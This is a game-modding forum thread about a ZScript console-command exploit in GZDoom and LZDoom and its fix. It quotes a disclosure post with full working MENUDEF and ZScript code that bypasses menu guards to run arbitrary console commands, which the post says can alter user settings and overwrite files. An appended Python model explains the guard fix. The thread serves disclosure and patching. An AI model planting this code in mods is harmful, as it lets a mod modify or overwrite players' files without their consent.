Console Command Exploit


Re: Console Command Exploit

Postby Graf Zahl » Fri Jun 18, 2021 11:41 pm

This has already been fixed after 4.6.0. Current devbuilds will throw a VM abort if this is launched.
Graf Zahl
Lead GZDoom+Raze Developer
 
Joined: 19 Jul 2003
Location: Germany

Re: Console Command Exploit

Postby yum13241 » Sat Jun 19, 2021 2:18 pm

Graf Zahl wrote:This has already been fixed after 4.6.0. Current devbuilds will throw a VM abort if this is launched.



So until the next official release, I have to be careful. Edit: or I have to use devbuilds.
yum13241
 
Joined: 10 May 2021
Discord: yum13241#8226
Operating System: Windows 10/8.1/8/201x 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: Intel (Modern GZDoom)

Re: Console Command Exploit

Postby TheMightyHeracross » Sat Jun 19, 2021 2:50 pm

Interesting. I cannot reproduce on my copy of GZDoom 4.6.0.
TheMightyHeracross
...and remember: his silence is golden.
 
Joined: 18 Aug 2013
Location: Philadelphia, PA
Discord: TheMightyHeracross#1716
Operating System: Debian-like Linux (Debian, Ubuntu, Mint, etc) 64-bit

Re: Console Command Exploit

Postby yum13241 » Sat Jun 19, 2021 2:58 pm

TheMightyHeracross wrote:Interesting. I cannot reproduce on my copy of GZDoom 4.6.0.



Does it crash? If it's fixed, it will crash, if not, it will say "HI!"
yum13241
 
Joined: 10 May 2021
Discord: yum13241#8226
Operating System: Windows 10/8.1/8/201x 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: Intel (Modern GZDoom)

Re: Console Command Exploit

Postby TheMightyHeracross » Sat Jun 19, 2021 3:09 pm

Ah! Missed the part where I have to summon the "Evil" actor, yeah I get the message now. Good thing it's fixed already for the next version.
TheMightyHeracross
...and remember: his silence is golden.
 
Joined: 18 Aug 2013
Location: Philadelphia, PA
Discord: TheMightyHeracross#1716
Operating System: Debian-like Linux (Debian, Ubuntu, Mint, etc) 64-bit

Re: Console Command Exploit

Postby yum13241 » Sat Jun 19, 2021 4:12 pm

TheMightyHeracross wrote:Ah! Missed the part where I have to summon the "Evil" actor, yeah I get the message now. Good thing it's fixed already for the next version.


Yeah, thank God a fix is already in a devbuild. Now it's time to hope the fix doesn't break stuff... and to wait too...
yum13241
 
Joined: 10 May 2021
Discord: yum13241#8226
Operating System: Windows 10/8.1/8/201x 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: Intel (Modern GZDoom)

Re: Console Command Exploit

Postby Matt » Fri Jul 02, 2021 2:00 pm

The "Hi!" will also print in LZDoom 3.87c.

Anyone have any idea when this had started working again?
Matt
Putting the XD into *xdeath since 2007
 
Joined: 04 Jan 2004
Location: Gotham City SAR, Wyld-Lands of the Lotus People, Dominionist PetroConfederacy of Saudi Canadia

Re: Console Command Exploit

Postby Graf Zahl » Fri Jul 02, 2021 2:03 pm

Some time ago I changed how the menu exploit guards work to make them more robust - but I missed one of the functions requiring the change, so it still used the old method, which no longer worked because all its helper code was removed.
Graf Zahl
Lead GZDoom+Raze Developer
 
Joined: 19 Jul 2003
Location: Germany

Re: Console Command Exploit

Postby drfrag » Fri Jul 02, 2021 2:53 pm

Matt wrote:The "Hi!" will also print in LZDoom 3.87c.

Try with the latest devbuild.
drfrag
I'm going to break you to pieces!
Vintage GZDoom Developer
 
Joined: 23 Apr 2004
Location: Spain
Discord: drfrag#3555
Github ID: drfrag666

Re: Console Command Exploit

Postby Matt » Fri Jul 02, 2021 8:33 pm

drfrag wrote:
Matt wrote:The "Hi!" will also print in LZDoom 3.87c.

Try with the latest devbuild.
As of June 30, crashes to desktop with "Attempt to execute CCMD 'echo hi!' outside of menu code".
Matt
Putting the XD into *xdeath since 2007
 
Joined: 04 Jan 2004
Location: Gotham City SAR, Wyld-Lands of the Lotus People, Dominionist PetroConfederacy of Saudi Canadia

Re: Console Command Exploit

Postby Graf Zahl » Sat Jul 03, 2021 1:11 am

It doesn't crash. A VM abort is not a crash!
Graf Zahl
Lead GZDoom+Raze Developer
 
Joined: 19 Jul 2003
Location: Germany

Re: Console Command Exploit

Postby Marisa Kirisame » Sun Jul 25, 2021 5:52 am

It's not a VM abort, it's a fatal error.
Marisa Kirisame
ZScript Crimester
 
 
 
Joined: 08 Feb 2008
Location: Vigo, Galicia
Discord: 霧雨魔理沙#1666
Twitch ID: MarisaDOOM
Github ID: OrdinaryMagician
Operating System: Other Linux 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: nVidia with Vulkan support

Re: Console Command Exploit

Postby Graf Zahl » Sun Jul 25, 2021 9:11 am

It's still not a crash.
Graf Zahl
Lead GZDoom+Raze Developer
 
Joined: 19 Jul 2003
Location: Germany

Re: Console Command Exploit

Postby Marisa Kirisame » Sun Jul 25, 2021 10:25 am

Actually it does crash immediately after with a segfault. I should report that as a bug. It happens after any fatal error.
Marisa Kirisame
ZScript Crimester
 
 
 
Joined: 08 Feb 2008
Location: Vigo, Galicia
Discord: 霧雨魔理沙#1666
Twitch ID: MarisaDOOM
Github ID: OrdinaryMagician
Operating System: Other Linux 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: nVidia with Vulkan support

Re: Console Command Exploit

Postby yum13241 » Wed Jul 28, 2021 7:40 am

The Zombie Killer wrote:[Developer's note: This post has been edited from its original form for clarity]

This post serves as disclosure for an exploit that was recently discovered in ZScript.

The exploit affects all versions from 3.0.0 to 3.2.3, but has been patched in 3.2.4.

The Exploit
ZScript has exposed various features to modders, one of these being the underlying code for the classes powering MENUDEF.
However, the exposure of this MENUDEF code has brought some security concerns along with it.

In MENUDEF, you are able to create menu items that will execute a console command when a user selects them, via the "Command" item.
The code behind this item has a private method named "DoCommand", which is effectively a ZScript version of Zandronum's famous "ConsoleCommand", but without the whitelist.

Normally, you aren't able to make use of DoCommand, as it's private and mostly barred off.
If the item's ZScript class is not "OptionMenuItemSafeCommand", the following checks are made:

  • The command will not execute if a menu is not active.
  • The command will not execute if the active menu is not an OptionMenu.
  • The command will not execute if the Command item does not exist in the active menu (e.g., if you created it with new()).

You would expect this to cover the hole pretty well. However, it proved to be trivial to circumvent the above checks.

You could create your own menu linked to ZScript and give it a "Command" item. From there you could modify the Command item's action (the console command it executes) and then proceed to open and close the menu to run the command. The entire MENUDEF file looks like this:

Code:
OptionMenu "ConsoleCommandMenu"
{
    class "ConsoleCommandMenu"
    Command "", ""
}


And all of the ZScript backing it up is as follows:

Code:
version "3.2.0"

class ConsoleCommandMenu : OptionMenu
{
    static void Execute(Name command)
    {
        Menu.SetMenu('ConsoleCommandMenu');
        let desc = OptionMenuDescriptor(MenuDescriptor.GetDescriptor('ConsoleCommandMenu'));
        let item = OptionMenuItemCommand(desc.mItems[0]);
        item.Init("", command);
        item.Activate();
        Menu.GetCurrentMenu().Close();
    }
}

class ConsoleCommand
{
    string Command;
    int    GameTic;

    static play void Execute(string command)
    {
        ConsoleCommandHandler.QueueCommand(command);
    }
}

class ConsoleCommandHandler : EventHandler
{
    private Array<ConsoleCommand> m_Commands;

    static void QueueCommand(string command)
    {
        let cmd     = new("ConsoleCommand");
        cmd.Command = command;
        cmd.GameTic = gametic;

        ConsoleCommandHandler(
            EventHandler.Find("ConsoleCommandHandler"))
                        .m_Commands.Push(cmd);
    }

    override void WorldTick()
    {
        for(int i = 0; i < m_Commands.Size(); i++)
        {
            if (m_Commands[i].GameTic == gametic - 1) continue;

            m_Commands[i].Destroy();
            m_Commands.Delete(i);

            i = -1;
        }
    }

    override void UiTick()
    {
        for(int i = 0; i < m_Commands.Size(); i++)
        {
            if (m_Commands[i].GameTic == gametic - 1)
                ConsoleCommandMenu.Execute(m_Commands[i].Command);
        }
    }
}


The ZScript code effectively queues up console commands using a custom structure, and executes them by opening and closing the menu after modifying the Command item's action (using the Init() method).
After the above code has been written, all that's left to do for this to be usable is to hook up the EventHandler in MAPINFO:

Code:
GameInfo
{
    AddEventHandlers = "ConsoleCommandHandler"
}


And now we're free to execute console commands at will:

Code:
ConsoleCommand.Execute("echo hi!");


Concerns
Of course, this brings with it a number of concerns. A very incomplete list of which can be found below:

  • A user's settings, including bindings, audio volume, player name, colour, etc., can all be permanently modified.
  • Files on the user's system can be overwritten with the logFile command.

As this exploit has been patched in 3.2.4 to the point of not being able to modify arbitrary files on a user's system, I strongly suggest that you update.

Sample
Attached below is a sample pk3 demonstrating the exploit. Run the sample with a version of GZDoom prior to 3.2.4 and spawn the "Evil" actor to see it in action.


Good news: a VM abort happens in 4.6.1, rather than saying "Hi!" like in 4.6.0. Thanks devs! Peace of mind.
yum13241
 
Joined: 10 May 2021
Discord: yum13241#8226
Operating System: Windows 10/8.1/8/201x 64-bit
OS Test Version: No (Using Stable Public Version)
Graphics Processor: Intel (Modern GZDoom)
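Added illustration (a constructed Python model, not GZDoom's or LZDoom's code): the three checks quoted in the disclosure only look at engine state that the calling script itself sets up, which is why the SetMenu/Init/Activate/Close sequence passes all three, whereas the message Matt reports from the fixed devbuild ("Attempt to execute CCMD ... outside of menu code") tells whether the call actually originated inside menu code. The names Engine, CommandItem, OptionMenu, activate and the "state"/"context" mode switch are assumptions made for the model.

```python
from dataclasses import dataclass, field

class ExploitGuardAbort(Exception):
    pass  # stands in for the VM abort that fixed builds raise

@dataclass
class CommandItem:
    command: str

@dataclass
class OptionMenu:
    items: list

@dataclass
class Engine:
    current_menu: OptionMenu = None
    in_menu_code: int = 0   # >0 only while the menu's own input handling runs
    executed: list = field(default_factory=list)

    def do_command(self, item, mode):
        if mode == "state":  # the three checks listed in the disclosure
            ok = (self.current_menu is not None
                  and isinstance(self.current_menu, OptionMenu)
                  and item in self.current_menu.items)
        else:                # "context": who is calling, not what happens to be open
            ok = self.in_menu_code > 0
        if not ok:
            raise ExploitGuardAbort(
                f"Attempt to execute CCMD '{item.command}' outside of menu code")
        self.executed.append(item.command)

def activate(engine, mode, command="echo hi!", from_menu_code=False):
    """Returns 'executed' or 'aborted'. from_menu_code=False models the
    disclosed sequence (SetMenu, Init the item, call Activate() from script,
    Close); from_menu_code=True models a real selection by the menu's input handler."""
    item = CommandItem("")
    engine.current_menu = OptionMenu([item])   # Menu.SetMenu('ConsoleCommandMenu')
    item.command = command                     # item.Init("", command)
    engine.in_menu_code += int(from_menu_code)
    try:
        engine.do_command(item, mode)          # item.Activate()
        return "executed"
    except ExploitGuardAbort:
        return "aborted"
    finally:
        engine.in_menu_code -= int(from_menu_code)
        engine.current_menu = None             # Menu.GetCurrentMenu().Close()
```

Under the state-only guard the scripted sequence is indistinguishable from a user's selection; under the context guard only the selection made from inside menu code runs, and the scripted call aborts.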
